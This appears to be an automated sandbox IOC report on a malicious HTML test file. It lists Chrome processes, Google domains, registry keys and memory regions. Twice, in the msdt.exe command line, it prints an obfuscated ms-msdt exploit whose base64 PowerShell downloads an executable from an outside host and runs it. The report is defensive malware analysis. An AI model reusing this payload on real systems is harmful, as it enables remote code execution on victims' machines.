Automated Malware Analysis IOC Report for

Processes

Path

Cmdline

Malicious

C:\Program Files\Google\Chrome\Application\chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank

Details

Is windows:	true
Is dropped:	false
PID:	5312
Target ID:	0
Parent PID:	1832
Name:	chrome.exe
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Commandline:	C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
Size:	2851656
MD5:	0FEC2748F363150DC54C1CAFFB1A9408
Time:	13:37:18
Date:	02/09/2022
Reason:	newprocess
Reputation:	moderate
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff614650000
Modulesize:	2916352
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Spawns processes	System Summary	Process Injection

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1960 --field-trial-handle=1824,i,13757677598881729272,15879241280713586661,131072 /prefetch:8

Details

Is windows:	true
Is dropped:	false
PID:	5676
Target ID:	3
Parent PID:	5312
Name:	chrome.exe
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1960 --field-trial-handle=1824,i,13757677598881729272,15879241280713586661,131072 /prefetch:8
Size:	2851656
MD5:	0FEC2748F363150DC54C1CAFFB1A9408
Time:	13:37:21
Date:	02/09/2022
Reason:	newprocess
Reputation:	moderate
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff614650000
Modulesize:	2916352
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Spawns processes	System Summary	Process Injection

C:\Program Files\Google\Chrome\Application\chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\1024203777.test.html

Details

Is windows:	true
Is dropped:	false
PID:	6104
Target ID:	4
Parent PID:	1832
Name:	chrome.exe
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Commandline:	C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\1024203777.test.html
Size:	2851656
MD5:	0FEC2748F363150DC54C1CAFFB1A9408
Time:	13:37:23
Date:	02/09/2022
Reason:	newprocess
Reputation:	moderate
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff614650000
Modulesize:	2916352
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Spawns processes	System Summary	Process Injection

C:\Windows\System32\msdt.exe

"C:\Windows\system32\msdt.exe" ms-msdt:/ID%20PCwdIAGnOSTic%20-skiP%20fOrce%20-PAraM%20%22It_rEbrOwsEForFILE=#7qnxE3%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=Aq$(iEX($(iEX('[SysTEm.TEXt.eNcOdinG]'+[chAr]58+[cHAr]58+'utF8.getstrING([sysTem.coNverT]'+[CHaR]0X3a+[ChAr]0X3A+'FRomBasE64sTrIng('+[cHAR]34+'c1RvUC1wck9jRXNzIC1mb3JDRSAtbmFNRSAnbXNkdCc7JEsgPSBhRGQtdFlwZSAtTUVtQmVSZGVGaU5JdGlPTiAnW0RsbEltcG9ydCgidVJsbW9OLkRMbCIsIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgZnFtLHN0cmluZyBELHN0cmluZyBFTyx1aW50IHVsLEludFB0ciB0KTsnIC1uYW1FICJ6IiAtbkFtRVNQYWNFIE0gLVBhc3NUaHJ1OyAkSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cHM6Ly9ldmVudG9yZ2FuaXplci5way9uZXdiaXRoZXJlMjAwNTRyZmRzLmV4ZSIsIiRFTlY6QVBQREFUQVxBbnlOYW1lLmV4ZSIsMCwwKTtzdEFSdC1TbEVFcCgzKTtyVU5EbGwzMi5leEUgemlwZmxkci5kbGwsUm91dGVUaGVDYWxsICIkZU5WOkFQUERBVEFcQW55TmFtZS5leGUiO1NUT3AtUFJvQ2VzUyAtZk9yQ0UgLW5hTUUgJ3NkaWFnbmhvc3Qn'+[chAR]0x22+'))'))))Y/../../../../../../../../../../../.EXE%20%22

Details

Is windows:	true
Is dropped:	false
PID:	5472
Target ID:	17
Parent PID:	5312
Name:	msdt.exe
Class:	system-tools
Path:	C:\Windows\System32\msdt.exe
Commandline:	"C:\Windows\system32\msdt.exe" ms-msdt:/ID%20PCwdIAGnOSTic%20-skiP%20fOrce%20-PAraM%20%22It_rEbrOwsEForFILE=#7qnxE3%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=Aq$(iEX($(iEX('[SysTEm.TEXt.eNcOdinG]'+[chAr]58+[cHAr]58+'utF8.getstrING([sysTem.coNverT]'+[CHaR]0X3a+[ChAr]0X3A+'FRomBasE64sTrIng('+[cHAR]34+'c1RvUC1wck9jRXNzIC1mb3JDRSAtbmFNRSAnbXNkdCc7JEsgPSBhRGQtdFlwZSAtTUVtQmVSZGVGaU5JdGlPTiAnW0RsbEltcG9ydCgidVJsbW9OLkRMbCIsIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgZnFtLHN0cmluZyBELHN0cmluZyBFTyx1aW50IHVsLEludFB0ciB0KTsnIC1uYW1FICJ6IiAtbkFtRVNQYWNFIE0gLVBhc3NUaHJ1OyAkSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cHM6Ly9ldmVudG9yZ2FuaXplci5way9uZXdiaXRoZXJlMjAwNTRyZmRzLmV4ZSIsIiRFTlY6QVBQREFUQVxBbnlOYW1lLmV4ZSIsMCwwKTtzdEFSdC1TbEVFcCgzKTtyVU5EbGwzMi5leEUgemlwZmxkci5kbGwsUm91dGVUaGVDYWxsICIkZU5WOkFQUERBVEFcQW55TmFtZS5leGUiO1NUT3AtUFJvQ2VzUyAtZk9yQ0UgLW5hTUUgJ3NkaWFnbmhvc3Qn'+[chAR]0x22+'))'))))Y/../../../../../../../../../../../.EXE%20%22
Size:	1560576
MD5:	8BE43BAF1F37DA5AB31A53CA1C07EE0C
Time:	13:38:28
Date:	02/09/2022
Reason:	newprocess
Reputation:	moderate
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff78dd30000
Modulesize:	1576960
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Spawns processes	System Summary	Process Injection

URLs

Name

Malicious

https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1

172.217.168.78

https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard

216.58.215.237

Domains

Name

Malicious

accounts.google.com

216.58.215.237

Details

Name:	accounts.google.com
IP:	216.58.215.237
TargetID:	3
Current Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Active:	true
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol
Posts data to webserver	Networking	Application Layer Protocol Non-Application Layer Protocol

www.google.com

172.217.168.36

Details

Name:	www.google.com
IP:	172.217.168.36
TargetID:	3
Current Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Active:	true
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Posts data to webserver	Networking	Application Layer Protocol Non-Application Layer Protocol

clients.l.google.com

172.217.168.78

clients2.google.com

unknown

Details

Name:	clients2.google.com
TargetID:	3
Current Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer

IPs

Domain

Country

Malicious

192.168.2.1

unknown

216.58.215.237

accounts.google.com

United States

172.217.168.78

clients.l.google.com

United States

172.217.168.36

www.google.com

United States

239.255.255.250

unknown

Reserved

192.168.2.23

unknown

127.0.0.1

unknown

Registry

Path

Value

Malicious

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}\LastWasDefault

S-1-5-21-3853321935-2125563209-4053062332-1002

HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings

ahfgeienlihckogmohjhadlkjgocpleb

HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings

gdaefkejpgkiemlaofpalmlakkmbjdnl

HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings

kmendfapggjehodndflmmgagdbamhnfd

HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings

mhjfbmdgcfjbbpaeojofohoefgiehjai

HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings

neajdppkdcdipfabeoofebfddakdcjhd

HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings

nkeimhogjdpnpccoofpliimaahmaaome

HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default

prefs.preference_reset_time

HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache

LangID

HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache

C:\Windows\system32\msdt.exe.FriendlyAppName

HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache

C:\Windows\system32\msdt.exe.ApplicationCompany

HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings

gdaefkejpgkiemlaofpalmlakkmbjdnl

HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings

kmendfapggjehodndflmmgagdbamhnfd

HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings

neajdppkdcdipfabeoofebfddakdcjhd

HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings

nkeimhogjdpnpccoofpliimaahmaaome

HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings

nmmhkkegccagdldgiimedpiccmgmieda

HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings

nmmhkkegccagdldgiimedpiccmgmieda

HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings

nmmhkkegccagdldgiimedpiccmgmieda

HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon

state

HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty

StatusCodes

HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty

StatusCodes

HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon

state

HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}

HKEY_CURRENT_USER\Software\Google\Chrome\StabilityMetrics

user_experience_metrics.stability.exited_cleanly

HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default

media.cdm.origin_data

HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default

software_reporter.reporting

HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default

media.storage_id_salt

HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default

google.services.last_account_id

HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default

google.services.account_id

HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default

settings_reset_prompt.last_triggered_for_startup_urls

HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default

settings_reset_prompt.last_triggered_for_homepage

HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default

module_blocklist_cache_md5_digest

HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default

software_reporter.prompt_seed

HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default

default_search_provider_data.template_url_data

HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default

safebrowsing.incidents_sent

HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default

pinned_tabs

HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default

browser.show_home_button

HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default

search_provider_overrides

HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default

settings_reset_prompt.last_triggered_for_default_search

HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default

prefs.preference_reset_time

HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default

software_reporter.prompt_version

HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default

google.services.last_username

HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default

session.startup_urls

HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default

session.restore_on_startup

HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default

settings_reset_prompt.prompt_wave

HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default

homepage

HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default

homepage_is_newtabpage

HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}

lastrun

HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}

lastrun

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8

Blob

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8

Blob

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}\LastWasDefault

S-1-5-21-3853321935-2125563209-4053062332-1002

HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon

state

HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty

StatusCodes

HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty

StatusCodes

HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon

state

There are 46 hidden registries, click here to show them.

Memdumps

Base Address

Regiontype

Protect

Malicious

2581D270000

heap

page read and write

2581D264000

heap

page read and write

BAD06FF000

stack

page read and write

25B4933A000

heap

page read and write

2B01FEB3000

trusted library allocation

page read and write

F51EAFE000

stack

page read and write

1A4F7213000

heap

page read and write

1CB4144A000

heap

page read and write

233187C000

stack

page read and write

16744CFE000

heap

page read and write

1E398070000

heap

page read and write

2B020170000

remote allocation

page read and write

2B01BE60000

trusted library allocation

page read and write

167455C3000

heap

page read and write

EEC787E000

stack

page read and write

E5B2E7E000

stack

page read and write

2075EE40000

heap

page read and write

167455A0000

heap

page read and write

2B01A950000

heap

page read and write

16744C49000

heap

page read and write

1A4F71D0000

trusted library allocation

page read and write

24543829000

heap

page read and write

6BB45FE000

stack

page read and write

1B42EC02000

heap

page read and write

1A4F725D000

heap

page read and write

16745593000

heap

page read and write

21E60200000

heap

page read and write

26E75FB000

stack

page read and write

2075EF70000

heap

page read and write

16745588000

heap

page read and write

2B01BE63000

trusted library allocation

page read and write

2581D2B7000

heap

page read and write

9D09E7E000

stack

page read and write

2581D35B000

heap

page read and write

16744D16000

heap

page read and write

1A4F6F90000

heap

page read and write

21E60274000

heap

page read and write

2581ECE0000

heap

page read and write

653DA7C000

stack

page read and write

2454388A000

heap

page read and write

25B48C00000

heap

page read and write

2B01B39D000

heap

page read and write

2A6C8400000

heap

page read and write

1674557D000

heap

page read and write

25B49312000

heap

page read and write

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
1024203777.test.html

Processes

URLs

Domains

IPs

Registry

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report1024203777.test.html

Processes

URLs

Domains

IPs

Registry

Memdumps

IOC Report
1024203777.test.html